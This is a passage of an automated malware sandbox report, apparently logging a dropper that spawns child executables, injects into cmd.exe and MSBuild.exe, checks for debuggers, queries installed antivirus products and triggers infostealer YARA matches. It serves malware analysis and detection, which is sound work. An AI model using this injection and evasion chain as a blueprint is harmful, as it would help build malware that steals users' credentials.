                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00CFC1FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00CFC1FD
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00D06678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00D06678
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_6C9D2782 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C9D2782
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_6C9D90E9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C9D90E9
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guard

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeNtQuerySystemInformation: Direct from: 0xBF5BE4
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeNtSetInformationThread: Direct from: 0x6C8E617CJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeNtSetInformationThread: Direct from: 0x6C30617C
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read writeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_00415D00
                              Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A781000Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 244008Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A781000
                              Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6F6008
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeProcess created: C:\Users\user\AppData\Local\Temp\u5qk.0.exe "C:\Users\user\AppData\Local\Temp\u5qk.0.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeProcess created: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe "C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeProcess created: C:\Users\user\AppData\Local\Temp\u5qk.3.exe "C:\Users\user\AppData\Local\Temp\u5qk.3.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeProcess created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe "C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe"
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_6C8E3470 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,3_2_6C8E3470
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_6C8E3470 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,3_2_6C8E3470
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: TrayNotifyWndShell_TrayWnd
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: Shell_TrayWndtooltips_class32SVWU
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: Shell_TrayWndtooltips_class32S
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_00409D1B cpuid 0_2_00409D1B
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0042086B
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: EnumSystemLocalesW,0_2_004170F1
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: EnumSystemLocalesW,0_2_004201F6
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: EnumSystemLocalesW,0_2_004201AB
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: EnumSystemLocalesW,0_2_00420291
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0042031E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: GetLocaleInfoW,0_2_004174E4
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: GetLocaleInfoW,0_2_0042056E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00420697
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0041FF33
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: GetLocaleInfoW,0_2_0042079E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: EnumSystemLocalesW,0_2_04160412
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: EnumSystemLocalesW,0_2_0416045D
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: EnumSystemLocalesW,0_2_041604F8
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: GetLocaleInfoW,0_2_0415774B
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: GetLocaleInfoW,0_2_041607D5
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: GetLocaleInfoW,0_2_041607D3
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_041608FE
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0416019A
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: GetLocaleInfoW,0_2_04160A05
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_04160AD2
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: EnumSystemLocalesW,0_2_04157358
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00414570
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u5qk.1.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0040996D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0040996D
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,1_2_004143C0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,1_2_004144B0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB88390 NSS_GetVersion,1_2_6BB88390
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              barindex
                              Source: Yara matchFile source: 1.2.u5qk.0.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u5qk.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u5qk.0.exe.5c70e67.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.3.u5qk.0.exe.5ca0000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.3.u5qk.0.exe.5ca0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000003.1758935505.0000000005CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb370000.11.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e901eeb15.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb370000.11.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb550000.16.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb550000.16.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e901749f0.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e900c6ca8.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee882432f.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54c537d.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee8848739.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54e4dad.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54d47a3.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee87fd525.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000000.2395167883.0000020EE543B000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                              Source: Yara matchFile source: 18.2.MSBuild.exe.900000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 6.2.cmd.exe.54c00c8.8.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.2.cmd.exe.52100c8.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 6.2.cmd.exe.54c00c8.8.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.2.cmd.exe.52100c8.7.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000012.00000002.2523771095.0000000000902000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2525694505.0000000005210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000002.2326661645.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7924, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3052, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\nkho, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ssfwvk, type: DROPPED
                              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7596, type: MEMORYSTR
                              Source: Yara matchFile source: 00000001.00000002.2493025545.000000000406A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: u5qk.0.exe PID: 7516, type: MEMORYSTR
                              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 1.2.u5qk.0.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u5qk.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.u5qk.0.exe.5c70e67.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.3.u5qk.0.exe.5ca0000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.3.u5qk.0.exe.5ca0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000003.1758935505.0000000005CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: u5qk.0.exe PID: 7516, type: MEMORYSTR
                              Source: Yara matchFile source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e900c6ca8.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee882432f.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54c537d.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee8848739.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54e4dad.1.raw.unpack, type: UNPACKEDPE
